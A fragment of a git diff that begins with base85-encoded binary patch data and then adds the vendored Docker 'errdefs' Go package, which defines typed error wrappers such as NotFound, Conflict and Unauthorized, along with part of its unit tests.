zA>^wr))ux$&(@;!^2oVB5^wM);`Z#YD0`@cxlnJ)H`H%idN1Xo*UiU?He?VJdO_9b zcH!y#H0WX%pB`CnvX+}EE~O}(vFdFU=zzOE8b-n|{AHtU+8+Q2;vJoZ_Z%H#<84oL z-xcw=9UFALJ+?dnJemz>n9y3tdD2a)EN=GQkhS+=fd~EOwM^UNv&U@su0ujxrO7%R zm)xiYuG=Q6XfdrbXs@cOh~F4oa?gIQa#d+TI{BX>T$jV4gRXnT6>w)TRi!GBg;e!fRP&jElJx`BoOs>`(N-WK(xN6(1 z#jrn-G8ngl4uedr+$20WY@P+?%Pc5M;IXf>?RFflR(igqe)eiTDVXR_#ADKCitchY zmB}a09Od2W#J#>z>)OffreLyfumaW*%=D1I_%dgi#cYS^R*ZN8I~1V>H*NnXSir&t z>*u?YwdyV+rjb{Z>1_5pOsgB4rM=%KoMRGnNNiRQQ-3o33H3U$QUdH3l?_JocOR0^ zs)D6SJoKn*ceF;cr*LJF`!qI=noqNHAF>*^AC12(1l)0p4I{@>J*vzpWFb5^_D{5) zoyuxd?WT*AF=ei5We9KEl^Lut&qZXD8T7l99(_f4e|BlIm^gc8rl+5w$d8RC404Jn z9Nc)$a-I5plHTJ+5nT7Vob%l3;I2JrcBx2?noI$8rk{JshVNLHH-H}fp5;-!tSqKT zZH-oYG7W(BOjBD=OIZ3~G5AAuWmQ!|3CqiSf-|2T#Zo5rf_v%yJdo7th&kZaM3V3Nz`NtJwodhrJ<(2*Rka zOb<=Y`PE*d(<;aTMa4o1(YV%@ks{u9Ck#rfX=NY}hWAwTx5~M@ z!?b2XGM(y)+^%d9H>1073YEW=B;YBQhRjql$Kna=Xc-N*c9X(?4WkSZ1sxO)&!YC$D5|K=zV@vB8O{ z#~etf_NZ?dr%{Es@ddi#hS-CDDxYwP56@e!C#8ER?c2`@&bexZ#b%Lc3-}J4E@de6 zr_>w}FrCg9N?C9%zMUxu{x!9j-?E(e$n(H(#e2e_J9nU&+sg9WdvURV!K}6Y_nxqM@|Ss{}Ka9wfGOReHBO zUGU6bEUcIL4EOTpEH>nZsNp<+A|~JZqUw`w3a*Oui8L_1ui`CV)0kY{j=$*7gEA7w zu)J`lW6_;WuPKPNV1la@s(w5z8!18Q-*LVkMtKYB6F5vV+A{+YgUe(>R<2Cl)G>*^ z-wg{@fbn81jR1Zu;N^Y+(~xhgzKM@`G%39K`S$fhkOjEVMNPVwoaJy~F;Rl2InqgS zsGWHkOJ+zS=KeG6RefL+2`ZhI%6J}C_bwUav_f&oyxn%!nMHNEO=BskS((zHs0l?j zF~jlA`m!Ch*GDtn2BZ&7%KXBR-ofT8GPI`kUqdQJ{m#QZIi0Q~l))(6e!b@MF%gUz zmP7iPN>7EwiU=u5GzyjEC_yNi`HG%tjIvKit}w9abEc_i!NxxU{uvXJS}#mi#MnlC zQt)|19*WMCfhy(~uN1@A+^6fV+e?Z*63YdgKLW}Yy7(!*h|f9x@?Y5v@MNFb(0Sw} zABNQfpjdBK+al^sr}oRMTkj&BZBFK|*jRU&8Bq*w(mM%4GS=^^guP$GQOQ1a5z(GwMMo~77s|_kGtt{QYSWMVH?b@t-+(8o2=(%W?2Vacwi^=>o=w_70;<) zuaHA;KuwtWV&A%lr# zPggV2u28HWxL0C_)Hl%JxF7_Dt1X1)zv zz#mt&KiK0|vdDmOJ3nm+PHLFq5|ty{^$3p>bk)7*UU)rNSmbM{i=rt94<-q3Wh0tR zeTqHGDmdx4IY!T5%S&a=5rB7Q4aO~w{w*M7Rhp%9$pB@A}t1m%X|s_eCx(Q z=aHs%a;8R7uuI>_2ihT>Pte3bPW_8=ch{)v7fU8ipm{!eKwl;l zD;Ba%`@d<{W}ACZRP{PM5>V2XQqzcf41PI?OOUK$tjI`P*#}5@e$Tw$QF;H!v7Xj{al8+puZ?Jy19K-6e#CtjK?D!|Vci*x&-1Cv;TU_6l-fgyC*9i2{qN?eHkWgjJg@A=vE-y+@#X)^tegApAC&58ngp*AMxidP`YC|Kj*rGSw5Twci znV8;(n}{>l9Hxw$(EWYeIbqf+V!6TlYCE7fR_*mZRhn zze&n4rGaO%4KXJCNav+`mHt-tJ1&LZG>Uj7=iUx6#hnbz$Lv-0>E``!Y!(Ro=wg%} zKca0zact!G`Vf{%59Q+|5cp|XVYO^G6C{z1f4BFb8_(Gvbu@p>p9@dG;!L7it{CgZ z2q+k?P7(NU8%8{-0eY5Jgwd7c`FP@R+pX}bROkeRkhAgcVAW%$+*28@cpF2kEuIe4 z=x4d5Ga^#NM1|d-iN&Yah6u{V)25S0an(1EpKiWBI=>ImwR!GA>vsAk0;Vw6aT(zq z+&r%%?97GSa%wnYYXq}(77C1b@R%(#mu1oWDD5X;U($WT5tPJpjehGRUPm@xAbI3Z z0%m+wsqxy9NzrF=bZ~<3N&M^`K7kw=k6bmpd0N9z$tW9O*1F(vxo@!RL4kOaD6NlXzvfN9>)bMI2e;U)|0Jk@tR@ceD(&X#cYMQ zXr!O(@N<~i41nx8Yc+b|-`R2w0ck3SC%v`r8tzZ-)9&I7o{&9DQ8{QPM_^R$qZp(G z9vT>g;!mL2fU_1hfj3U5Ca*Y2gc-+!Mij&F6L*nn>*`l15u2mJXHa@ps^gy9mK?FQks;IQq!zf$>nuXQ*w zB_C!&jUZYZoI@8dZo#2V;I!lV?0oUNIo@5UjcN5AU2bN^{GSs#gt^90B2q#Wt!?yKV7}5(ONFB-@Mge zh{+;CuIP4+6F3%iD{DN)u*-WmT6KJ&QG)~>MH3|-CjQ6Ux zJc^7PYF};dC8S-;`&pyiFMlzkx)@aBC1#px1U(AL`fcB`%}XD$*#4eRVO~J5Jo;=Y zKhdjMsR7yrN&7tw7xTwthZx}=U?hhJn{ca3NGq#Nc|_kh|F?h*8r^S}tUtq%Rs>+& zoUdxM5@)Fs1;KD=$2)(#mAwfB5$cUL9jT^*ZZn^N!B#Z#lQKNx0ei3)IA~QW>loyE&Mm^4T$1G(Y@_;8p+1QIp(A0=s-J z2Z`yH_vX=xG)jBV4o#algt{`+RdE83AWJoJ3-GtJ>aT~IDEf)GJ2({S3xLSLP9hqF z!Oi;?g(Gu>^0(-+yD3?CH-jyJm#aa#TF4CfGCxHYuPx+M<6^^TC`u?%961@73&7s^ z-UkD=u)?!km79EPCKVtQbt=uUtxbyyiz1c$m5UTMLX$j_9GY!#SUzXsRKG6A$xmN_ z7CR(6K=6JHvy8xLx?HQBG>g+k{4v+47CWW^BmLP0`|#;LlUz~QEbQx`&JkCNJ$IvS zYdV-zuM*=;E-mgeWqC7^`UYoRnRb{yMbjfG)`jh6F2yMR zx!U(}G~FZ?8)9BO>8kOw^zc4bl%-%n#_^-6xO|IAy_PgkdNlIq_N@Ep34n4{CG&9} zdlc4kzv4ke%`)@D z1)5YmYuWxUuqOLUg4H5X_N@?wtJNLVSl&_Cx(LoUKm88cUCa)(D;948!^Lpkaj4Y? z)m;b=SqBDqes~`O)Bm_hV5`JjDMD#a9C^zO7X%A*0e8gx3 z6l$$f{}X1(Z@HT$LBy7D@{D6U4tt%^Fly7Fg6e>sZU6zB9H0;c78rWG8mcfK#<3`5 zDgNd`0|N6{G(7eBZY%fnW#yep*2ba+elij>xaD@jAh-524&Y=88qD3T-lZRu9*Rk# zU9)iRv3={60Fg}gevm1ZI{hYbGaV#{ZL8$yGZsq4tX_x_@47ACAw&WmLB1nSdi7U0+e*Dm_OgCqY~QZ`s#kC!Od3!dEK@_ugBv}+P;>e`AqINU(Qyi-?Yus6?OQ&sc-VeH%gp;*jgxQ?avF(mm#WW^uVl^Kx2qD z^8oK^oUorcR_wNFAV0tS1qOM0$A!>>OwW!G`1Qws@GEmM118FQ*ZM+%c5-~|LmKoM zT$Vy3RP#n*Lz(x@SCrWb^_ply`W8nCgQ-3Wknkoil}U~&?;4m2g5Ch|fF7)q*6yc) zd3%#Slyv{0PN!6y7W?#-S{JYH?wP!P5m#=Z4mfsFIoz0bDSCDTYM3NF{2{2gN&ebED2W?lVC$@@bD#R!kj?HNcKBnc4cBK3w+{&z|qRDVi1 zw6ZG_STl8re>EY9sVW(X-z59S;s0@UO%|Q=0)sLEg)#*z$l2|EAHlNhxB3f=BD9A( z4IZ)sE8t#+^ERS?M{19897zddrX`JD)>4|V`6-LdFJ42eeK70E4&bNTA=-dN`%&Y6 zt7s!|Yqaf{9cVxaLiEzY!5HozrhlO;qH@&w)zRdRr_h>yt&C|GR!d+?Ea9&HZkZM; z`1m10Q2gNJ%DAiHyQMT3$+@o6i2l!DT!;~ruFn}%`i5%FPU=XQKQI0yu29Ye+)XVq zNtB5KhjjU%fVn@abmfQ!F6zN!|5Tb-Maa>QT}c8mU63RfE8w7F*+HAJWzBP)*{mIc zdsiN=Ff%tL;_@o8rJT^~f#RtZ&XEw}NeM({bmx8ft|Hi?jtgIFKo7WLhD@o}8aEMt zc04Lf8clTAElT~R3yw6DK36h7p5x{9Bo?_tv0dG-4EcOhSw@{*L#24*JL)!!zb z)6ED{E{8{c^93nijj(+-|Da+(q7i?a#*ScZ_0|u)&+8_a`=eSiDv$NyN-89UxqA%r z7^EhrD5rjkn`%bmEtW|hNGCf#YY3l#iOazjf(Q?M?)PxoAl0qRRiq0M#-p&F;tQU# zUIv>WW|&?Dv-QhPR!V!`ZaGNG072OQ`150eUC|Bco$+N6ql~V#x_*@OwUP<^%P@hn3 zB0`T3FL>$|ZM5pb;rB-=Xt1Fmz_(x#3Hh?)J~bJNq*N-y!43 z#Uwckx+7%{zC$)Djv#a`!QS1?xrv8E;DI^YEN8sou{I3#%@_r{-qmRRGC0i6JlMt9 z_k`5z^cDF)%0P?ik19@M`U!gvoF#GEk3}&fM{n^ts*bW+Q=u|3$=}h3%*|?4)eAML z4he*WSc2umn4yTo%sW;rnA64*o`i)5p-Py>xFTcE7$wXUk;>&5qtVCWSI%ewvBUz3 zAWrT0Eks(*ab~F!l+do>g|E>|R56?Q;9(GW{S5uVN9FgwTPF60)0n92s?X0EC=bSygB(q#PuZVKT4iP; z(|W3^G}~iB@k2C85JU`1-Hwn`l&{Z7VO7kA3a|Hu@}S1m=B$cssFWCq+3Yl?MZ_6G zsQ~u+kScJ;Te{rkSTiflF@$Fl5%`qs6f$xCbA?j9A4<^g6mn0Aulc0nSixW$W!!hi z(x74=mYU^d=ZO4QFlz2B3I0I0eSmkcz(1fFOyJ*g7^A+XeeC?>bj!^6K zYrpk$fJiW=1JPka2B{66#UgER1LC(>YC+R-OKZOg>sGJmEKqa+5QfvgV4Ah?B#&gBDQ0B2ijn3SR&E_o{ zjv@x;f^yekAle@(Z`qurA>`em`{QdP&yk@RH~Ec~Ix4-6mbq*WM48F29cM%=0@_gr ztGC#5w^w_yOcVubkP2wz07i%az?b9|S5DI#R=m5{G=o8n=ghV4Ahf!b%|KpkaB~sg zlbJyZDn7DW?2C74v+zd*x86BS(8R)I?(aalH1(EI0%^v-%qohb&CR!o zke{`w1^unpo5Fzg-5}w8=8WUhM@9Q|hXYiVmm1H0O+YnIM-y9pP@z2=FOMZ=*(K(5 zlB<1zy4f$TpJ-XY4b*321WS3Zxvy$@MC3A9jpZ6nlRh>JYHz4wr{pmX3Jgh;fM#8KrpG(*?g{% z*R+iSl*3LFtU20@AgN^NIW6f!n1O$z^_+j`{TXJZOr|?DgnpNIUT?wBY;c)hi*-+v z=J`5^_-uLnJN@?PcDYGBz+rQ$;_Q6nw*~8N;d;sE50KD8AeBGQ&DNy?0RmbXOnL2b zZFjghm6L6QPC++QUz;ChX3O}fSSP&93rP`CTj z6(-$C1E9tC7Av_*Z@s7wmtlD}=rtXg;Acc?nVNEg{g7bYA9}^rSnm5%c?F-FT#!ch ziA1&Kw|N9g8M{f_Ya%qjniGigbH(uz$KAL`ysF$ zLJ94Ex zH@)IZ1r6>feHxP8M~O7Dp@LUtP|E$56dQk?17-R$=bBrpm{@7#QW#E;ZlECvvZ@7P zG{~5Te$=EdGZQ@@vpRHDc(>rR%AvUp2y|wf7KtAS8A0( zSos_My4g_YM1LTQ<~nN6P>-6swth3wb}U{qLFIac(X_bWEfH&RBn*@0;YRNVlR|d3 z3B+o*M^)bE%&`QhO<|C}X}9vX(dCHfA{xn3u|W$ngL{f|GV+3mm9~y_p%RKi&A1@! zq2#TV&`dXQRw<{K%$Px~N0~C0Tb2m(hQDo&h;;+wFP}S3u)Q9ZuHBCuBBg|kTwxv< z*qYV^T>Mou#N-#ZzcQ-SNll&PJYlukBZ&K<(di?92u6&m_KY^-Q$riPW&qWo=6Fgp zRZlZ>G{H*h&!H&Nc2jMCL~$GLM-p#$E%c}nV5N=>S3`*P3``SypDhum_d;8%b5sXd zkf)nbs5yo4vNeK%4lLX26BWxyKAgV+f9s<_KjRs@>KQ9q9)A@$>Tm?Cxtc=|LZyua z3NDF}`}K`#2CEUMrow1J2FDRzw3-dQNiE+|>*LaDG-vg=vsVu2jhxrwRHxO>c(B$f zlHxSV#guxTxkRc6jB2ZdLFq51s94g%F5?DbO;!D7E1skkBV!)n`U(p{u^Xjx0t2j8 zrpTOyX~eltKRnw3xis|T`Vn( zQxET+m1;{Ho&lKD1p8{e)~|#cZFJgW3ZhM+O;#(el%P5{17I&D zSP-V=tD5d5q@`&_HViYi0b`sj8juHTpbB|*K;49|L!w z-(hBR8*}fIl131^hi_uo2)DNQ-Vo|W4zOO=n5s~t9afv#RDBKgcIRzyS?(<`B*YwzMF$*uNw z*f#cPL7dS%z8X&!r3u2ytZ`#Xe`u4Ca zvQmK-cMt!?6KYVAAbARNRd?EQ)OCSLR|jKm2B%N4nyc$s&g)s=1TjIi=zF_c{rb=> z)Cy`8!Gb)Nf@yx=M^^|oKbkcXl#}T=b=fkVOXl;S6I+DGw}D?5nfk3PJ`wC&zXa`1 z${k`P6Uo0(uuUBjwx@v)dq!`Fx|jj{^F}dDYt=!+X9x6pYBxbmYQMSr=SSET%ILGI zHpfzq(x4dyRLz1MHHHFK?y}aK>NBC=p{Ftlovpocjmbl~N8SoeyD?qj6TSGI#OjNv zjKn!vl^SdcoRRlhes!b7>t--J(MRrM)+e`A#%Dnk+0=gUai0NoB@@2qSuaMY)+dzo zJ$EyV@uOW?%MtPjH>eFxv5M6R3UWYzfK*RnmO_EZALJZ|#~{wVH$oAh52?qrEmc~x zTLTx6S)qY@I$BvDoBfn%CjsqXwUirUoNf*93bT$koXipP{v-6nDYnFJ708rr6a0PL z1vsKyh__fyokD|YYe?J;v~)g??nnBCO&Z%^V@ln^c(LlI;D%ibzEWrA$H+fpo1^pYeA3T6$cDrCg=N?uhSPMSgl@N1q^{RjAC48eED}oV+v<-} zlgxS=A?noHYmRt#6=HD|MqVjef2{3R>v&3u$Aua~UFgC#e6_#tJBc4FbUL4&dte>C zi7~Ptq#5F?)$o>rItsLMA_E4M$OK$i=LD46u44`uT$Lt_zaX&5a#vBbEIJOPQw!lu zq-Tq(cmj1pJ>i57u(|&rv=~Qmb{44t@7d(n3s# z9T}^Y&}sWeTEEIr%2VsLwqPd zOT@lqh16;ifTTZTru!md_NA?1m{DgugQ}pgx9&=?(i+y9Pf|ANoD7r%_IQumX}8V3 zM}7)f36r2%wfQ_|-y8C@}iPUkhncqC&ZS%MYK}DqTiMrEpefud%ZnO(I9F6n+H=0h(DZ7=d0-Xm9>8w8q7X(w9!bYuiz*``K z)KC1KhrmTEXDsKzjO;bzg8D8~F9J3xjPi!1M~l9}sam8ihsq9I-_n;p7LpnC|PZum_{w9h{{aSjTT`(OIC* z>|(wFyI0LC79J{!w>Yq_hEn=0(tg`$XKG70Ht0yiVHDV)$2D&W@Ai+sZ+H8?o3_&W zLP6LD`M+@d3MHNX%^kp8_inz<@WDdcN*S@(@O5ib(|3zN zQzRy&a%CpB&y0PkpSLZbsME%Cm=m5x-pj|LPEQWNkR3IdSTbZ$l%&=U=X|IgQ!?ZG znbH)Twr{G~(c)mD%jY^frpFFYBmvY4`&UG)_hB<+U09{iK+6ektQXt(C5m0uHQqPs zdpm#EEcRUEb&p*x(J%x}VX@f(+n$8t`W&+%gu^f21 zoj5q{L`UlHUzgU>6R0&U>~v}L>F$&HnQiN9b3tOmWvD-Bz$j5Bfs@omyCJHN%A^H- z9}Em7?caX^lqSYyBUv1F1h|I^-a+#+!f1R}8)%`q74{FyI}$GC84a7f`N}2yP#Y=$ z`$cN)MA~1oqDW+J_7cj3y+K|Dx0-%eo{xGlp0cB6{*81!)h2CuuVe}*ups>w&Bucn zA{5SCFeGi9=5Qjn)^LB5+70b1x+Cl&` zl}5LxJXO+CDPtuBQcz7K#SM(%z%9N}`B+Dxkk&!}trLqz(;S*hkkE1!!U)!aM8uvE zT*@ix#b2pFh!>{)xt~$B{YTxFLAK#?p9TvYQ437y^DCG-8LXKo(9taLG)3Llh@7g9 z4KSWU@qcPK^Khuz|BpvB6KVz}vJ)c0(;#FgMcD^qE&E`MrI0Df`j9QmV3K{JVeH0I zvTs8n`;4p&WiKLS`5yhA-@o^Do%^5rT<89r_wwSDTsyzjR#<9$nx_khPAqwXDsjlD zkB;E=;Uw-w<{uPuZ_ig3)JOWLg*A`&zeqmsBHy`k#s23LM2NAif>MfS1{Oa$rT|IR zvd{u_6)&bc?1Nu7#~1Iud6?QY_5{R_roK;oyaJo|Y2h4s#sC6x;%@A%)4VN{Th=$7 z9tG_B*tE0#`$bE2%1^Pq+o|wV7r7G5>xrFmuz`!f%`lC?bnwz!1lIN%c&K$AEBy!x@zgp_@N#YF>y{-vS)6(UNaV(zXcI zOQ7%NHj>uLawOWj+B>4`r73Z#8UtAcZmZL5eDZi=RnlQhk{}H=O46~N)bGB=6r-lp9Jm;i*T zQP0LFJ$Jq|b{#r<6j@8Fj`lXuF6%VH1VGGHk?_s(l0EflARt0%N@!6f!@}q=GW;cV zY|bySMIZtblwL{2%tGPdV%~g{6oubU8Bz>?S)3NCKV!o=Pe~G#&-n8$BxqezqbnZy z`8@y877SiOn|Sj*VrU-gRcw|JqJ@{K*RUj-&Xgq>Ru$eZ25pVjiFxQ7{26ok-b&w{ zAeXHvFPaqE!6n630n~-JEa=rzk9ZQK!go(9D0C|<`4^_hn1n|o3wCkoKDj1JC!vIy)E#FJ--}q%BFZj**!#%pDqFSpI z5oNYV+V-aly4qIhCEN2pz}UTKDUJTzF}U!%ma#Z0oXE?l=-B%M1{4?J7a2?O7>IzD z9>t2l%ksXZ{m*VbkRSHV=^MDsG2DOK*<~XP_==ef{df=aYIXYE&(T*b+~06|SfFNo zLS`bXaz?ENZHy2cyP-d`ZQU7K?y@U z3rO&(^z1Hu4Mt^Q$ylLhC!pYVrjHtB;fz{_#Bp?+MO165mvxspK^uX;4%oypZT23= zMX_o>)*zll!>$*~Iw8~spD3Ds#8$~nTHqS%dRv5_)tgZv53DPLoYsD@#cLNoDa+y$ zVos){T>jw0c|zJ@0K_)ahe{q^@8cT!q)4(Z=FaGD6Kwtk{YnkWeaJ48p`IyKWkLD~ zy#dZmv81q{36;|gx5XI`i7?Hq{`x*Y6f|~<{jhANQI9rR9dFk=QDvIHa|b)!jBzIz zwo;Dk@GR*hj#4&T#2`*t- zn6gcS&q)BZVo>>HcZNzd_{3(n4^@_6; z%MA{ObQTYxz!!A2oj0rKpbfS^A=Tmu1iQ)VM&=f*=U7n$%jwzAPQK!7jC)B|G8u%g zitgIG_{L52;2kps8>JBcHCYvk!`Ir2NBN$vE}t#G)w>L}!GN3t98qs}}@gjfebVY3F+SKs6s^+LrsnmTs+h{HB zR-iShZe{E_VAptc-kuRQTXn*mV6=+ee8!A=hSKCFG>#hy=1o*ON!oL`I>d(=T1<@v zi!h7r$X9xrimdLn2KV!iPyp)#+|;JbW;z^Fi~QL(DIlDM%@#A{u^`jNuNFK&njzv~ zM^5Dp$3620J1}?~A^;@CtI7RyWjc0|DN%xO*8wQHJljN2)HNl@E$Og z1jLBWfh^bbgM2JeNnuUDP$lVRVc~u0)dA48cOZuJl6q90T|+2m?ebvMdpQklv2fW% z*#usb-I-7DDei+IwKX>srl3kPlM>GiVvlzjh>b3@Te<`MKz!^=j%usvf&B9 zWRe-UI;kI%iTiTcuCJwDV@(%2rRaOvvGEez1(P5AMn%V}d?tD4E{VoP$w|kE7i~!2 zy;K^@p63O4iv3G}1k^BxB0YGXt)ziPCdXO8TQuXznNJfYZQ*`}z=7AmIx%nOb0sF{ zod5Q6EpH?rZ7j6Yq+KU@iGsr#RJTYFCU1CeltiUhHwRyx{axeQeKq|1#rQgCZjUy& z2`>(3L9&JRqe^vOXgAgv*7?j3KBxu_A>6iizDx!nS;aa2Tu=O zDa`2iuvl5fjcW?kydc92zTEQWlh>|+E{zt=a)z+`vYxM#**~TP742^1+KguYEO-^P zptGYu1H>+3zqG%seS=$H_{!c?XP-9KH@fz#6nT8Lw+%6H@*YCLnZA0ajmP?4Eof8; zJ;ye^YrQRR`>7FikLK`=FLXF|;%zIujmJ6eoMb-iR6isGxR+C_-XUF>BQihL1A7%ygE{TwZpOdtcuB(iaK54kw8OuB>WyIXLILxV0{Ak$F#09_ zubm{w=yN4kW;on&8LI&?e~Y`jcJo@e0S6*(_BrA$(hzy{;giG0MhEg*LnnAll}nU% z)R7|WZC@Kn_shP&JpKMf0LQxzTAGsfF8DOb{%>~MBG65zW3tXkOfe5=`>VlI!O!}S z{9Pd51BEgazLcITt_@JW7aX_2bFnkXOK)n7#O-4yIOY2OLxXKn>-OMLl3dM zhXMW5BFon1q#Wtz*9jAuF8cy*GWw2SjDrKMf(OdKKgUkzW#w8O99J@uPwFPEUB#=aU68Wg&bp( zaL5H_c_58^QCZmJq53z$eElK{-N0P4R?0#SEznthaFayi%`WCS zk{p_rjPL*~1MVnI08c|GHSJLc^dTYWY)qIHDHnCW)ga`Y`IB<%<`)k88vmrB_|Yo* zHjRKIVfu10;ms-YnV20-mY$RcsZqu?ug^+H<<~I@R%WO3bpH$T#Uay0HLdTDR&X|L&a>X2t5^RsV7Sr&0p9YHZ*J%~%joua3^w)i~&YfkH=K>zV%+4uPTZ z_>AX&vnJqLaO6b>R6~1D&fEKaiuku4%7%8nIEQzkohi#UWg%VY3E%sYh?Ja6c!;oe z|ALFOJNf@@S0G=d{VI&y^aOBA^9WvJLm`XWj0+V&aJNcoU92*XXq5F;LMlsEcJy@d z&8QzsoSrr`UP(Y6KE@@b3qzNgYt{~QyK-Dh#)n!9x(k_jAcE?7N*mLs2+P%^fj@j* z_P0EeFZqd(bFy$!*sc4>Rh9r_LN{jWZ>r{)Dz~WzK;y8%(@!^(0hvpD@0r6pAb3`) which can be used rather than asserting the interfaces directly. +// If you must assert on these interfaces, be sure to check the causal chain (`err.Cause()`). +package errdefs // import "github.com/docker/docker/errdefs" diff --git a/vendor/github.com/docker/docker/errdefs/helpers.go b/vendor/github.com/docker/docker/errdefs/helpers.go new file mode 100644 index 0000000000..6169c2bc62 --- /dev/null +++ b/vendor/github.com/docker/docker/errdefs/helpers.go @@ -0,0 +1,240 @@ +package errdefs // import "github.com/docker/docker/errdefs" + +import "context" + +type errNotFound struct{ error } + +func (errNotFound) NotFound() {} + +func (e errNotFound) Cause() error { + return e.error +} + +// NotFound is a helper to create an error of the class with the same name from any error type +func NotFound(err error) error { + if err == nil { + return nil + } + return errNotFound{err} +} + +type errInvalidParameter struct{ error } + +func (errInvalidParameter) InvalidParameter() {} + +func (e errInvalidParameter) Cause() error { + return e.error +} + +// InvalidParameter is a helper to create an error of the class with the same name from any error type +func InvalidParameter(err error) error { + if err == nil { + return nil + } + return errInvalidParameter{err} +} + +type errConflict struct{ error } + +func (errConflict) Conflict() {} + +func (e errConflict) Cause() error { + return e.error +} + +// Conflict is a helper to create an error of the class with the same name from any error type +func Conflict(err error) error { + if err == nil { + return nil + } + return errConflict{err} +} + +type errUnauthorized struct{ error } + +func (errUnauthorized) Unauthorized() {} + +func (e errUnauthorized) Cause() error { + return e.error +} + +// Unauthorized is a helper to create an error of the class with the same name from any error type +func Unauthorized(err error) error { + if err == nil { + return nil + } + return errUnauthorized{err} +} + +type errUnavailable struct{ error } + +func (errUnavailable) Unavailable() {} + +func (e errUnavailable) Cause() error { + return e.error +} + +// Unavailable is a helper to create an error of the class with the same name from any error type +func Unavailable(err error) error { + return errUnavailable{err} +} + +type errForbidden struct{ error } + +func (errForbidden) Forbidden() {} + +func (e errForbidden) Cause() error { + return e.error +} + +// Forbidden is a helper to create an error of the class with the same name from any error type +func Forbidden(err error) error { + if err == nil { + return nil + } + return errForbidden{err} +} + +type errSystem struct{ error } + +func (errSystem) System() {} + +func (e errSystem) Cause() error { + return e.error +} + +// System is a helper to create an error of the class with the same name from any error type +func System(err error) error { + if err == nil { + return nil + } + return errSystem{err} +} + +type errNotModified struct{ error } + +func (errNotModified) NotModified() {} + +func (e errNotModified) Cause() error { + return e.error +} + +// NotModified is a helper to create an error of the class with the same name from any error type +func NotModified(err error) error { + if err == nil { + return nil + } + return errNotModified{err} +} + +type errAlreadyExists struct{ error } + +func (errAlreadyExists) AlreadyExists() {} + +func (e errAlreadyExists) Cause() error { + return e.error +} + +// AlreadyExists is a helper to create an error of the class with the same name from any error type +func AlreadyExists(err error) error { + if err == nil { + return nil + } + return errAlreadyExists{err} +} + +type errNotImplemented struct{ error } + +func (errNotImplemented) NotImplemented() {} + +func (e errNotImplemented) Cause() error { + return e.error +} + +// NotImplemented is a helper to create an error of the class with the same name from any error type +func NotImplemented(err error) error { + if err == nil { + return nil + } + return errNotImplemented{err} +} + +type errUnknown struct{ error } + +func (errUnknown) Unknown() {} + +func (e errUnknown) Cause() error { + return e.error +} + +// Unknown is a helper to create an error of the class with the same name from any error type +func Unknown(err error) error { + if err == nil { + return nil + } + return errUnknown{err} +} + +type errCancelled struct{ error } + +func (errCancelled) Cancelled() {} + +func (e errCancelled) Cause() error { + return e.error +} + +// Cancelled is a helper to create an error of the class with the same name from any error type +func Cancelled(err error) error { + if err == nil { + return nil + } + return errCancelled{err} +} + +type errDeadline struct{ error } + +func (errDeadline) DeadlineExceeded() {} + +func (e errDeadline) Cause() error { + return e.error +} + +// Deadline is a helper to create an error of the class with the same name from any error type +func Deadline(err error) error { + if err == nil { + return nil + } + return errDeadline{err} +} + +type errDataLoss struct{ error } + +func (errDataLoss) DataLoss() {} + +func (e errDataLoss) Cause() error { + return e.error +} + +// DataLoss is a helper to create an error of the class with the same name from any error type +func DataLoss(err error) error { + if err == nil { + return nil + } + return errDataLoss{err} +} + +// FromContext returns the error class from the passed in context +func FromContext(ctx context.Context) error { + e := ctx.Err() + if e == nil { + return nil + } + + if e == context.Canceled { + return Cancelled(e) + } + if e == context.DeadlineExceeded { + return Deadline(e) + } + return Unknown(e) +} diff --git a/vendor/github.com/docker/docker/errdefs/helpers_test.go b/vendor/github.com/docker/docker/errdefs/helpers_test.go new file mode 100644 index 0000000000..f1c88704ca --- /dev/null +++ b/vendor/github.com/docker/docker/errdefs/helpers_test.go @@ -0,0 +1,194 @@ +package errdefs // import "github.com/docker/docker/errdefs" + +import ( + "errors" + "testing" +) + +var errTest = errors.New("this is a test") + +type causal interface { + Cause() error +} + +func TestNotFound(t *testing.T) { + if IsNotFound(errTest) { + t.Fatalf("did not expect not found error, got %T", errTest) + } + e := NotFound(errTest) + if !IsNotFound(e) { + t.Fatalf("expected not found error, got: %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestConflict(t *testing.T) { + if IsConflict(errTest) { + t.Fatalf("did not expect conflcit error, got %T", errTest) + } + e := Conflict(errTest) + if !IsConflict(e) { + t.Fatalf("expected conflcit error, got: %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestForbidden(t *testing.T) { + if IsForbidden(errTest) { + t.Fatalf("did not expect forbidden error, got %T", errTest) + } + e := Forbidden(errTest) + if !IsForbidden(e) { + t.Fatalf("expected forbidden error, got: %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestInvalidParameter(t *testing.T) { + if IsInvalidParameter(errTest) { + t.Fatalf("did not expect invalid argument error, got %T", errTest) + } + e := InvalidParameter(errTest) + if !IsInvalidParameter(e) { + t.Fatalf("expected invalid argument error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestNotImplemented(t *testing.T) { + if IsNotImplemented(errTest) { + t.Fatalf("did not expect not implemented error, got %T", errTest) + } + e := NotImplemented(errTest) + if !IsNotImplemented(e) { + t.Fatalf("expected not implemented error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestNotModified(t *testing.T) { + if IsNotModified(errTest) { + t.Fatalf("did not expect not modified error, got %T", errTest) + } + e := NotModified(errTest) + if !IsNotModified(e) { + t.Fatalf("expected not modified error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestAlreadyExists(t *testing.T) { + if IsAlreadyExists(errTest) { + t.Fatalf("did not expect already exists error, got %T", errTest) + } + e := AlreadyExists(errTest) + if !IsAlreadyExists(e) { + t.Fatalf("expected already exists error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestUnauthorized(t *testing.T) { + if IsUnauthorized(errTest) { + t.Fatalf("did not expect unauthorized error, got %T", errTest) + } + e := Unauthorized(errTest) + if !IsUnauthorized(e) { + t.Fatalf("expected unauthorized error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestUnknown(t *testing.T) { + if IsUnknown(errTest) { + t.Fatalf("did not expect unknown 